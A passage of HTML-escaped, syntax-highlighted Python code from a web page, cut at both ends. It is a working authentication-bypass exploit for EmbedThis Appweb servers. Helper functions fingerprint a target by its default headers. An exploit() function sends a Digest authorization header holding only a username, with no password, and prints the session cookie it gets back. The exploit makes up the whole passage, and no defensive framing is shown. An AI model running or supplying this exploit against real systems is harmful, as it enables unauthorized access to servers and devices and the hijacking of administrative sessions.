class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-24\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">test_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8221; extremely shoddy recognition, expect false positives &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;X-XSS-Protection&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;1; mode=block&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;X-Content-Type-Options&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nosniff&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ETag&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Date&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">potential_auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Last Modified&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;X-Frame-Options&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;SAMEORIGIN&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Accept-Ranges&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;bytes&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-Type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;text\/html&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;WWW-Authenticate&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">potential_count<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">potential_auth<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rv <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">potential_count<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Optional matchings: {}\/{}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">potential_count<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">potential_auth<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-49\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-50\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">test<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8221; Newer EmbedThis HTTP Library\/Appweb versions do not advertise their presence in headers, sometimes might be proxied by nginx\/apache, we can only look for a default headers configuration &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># EmbedThis GoAhead uses a similar headers configuration, let&#8217;s skip it explicitly<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">serv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Server&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">serv <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;GoAhead&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">serv<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-59\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">test_digest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;digest&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-e\">test_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;form&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-65\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-66\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-67\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;joshua&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">authtype<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;digest&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;username&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-69\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;authorization&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Digest username={}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;user-agent&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;TruelBot&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;content-type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">authtype<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;digest&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-80\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-81\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-82\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[!] Exploit failed, HTTP status code {}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-86\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[*] Succesfully exploited, here&#8217;s your c00kie:n&nbsp;&nbsp;{}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">dict<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-89\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-90\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span 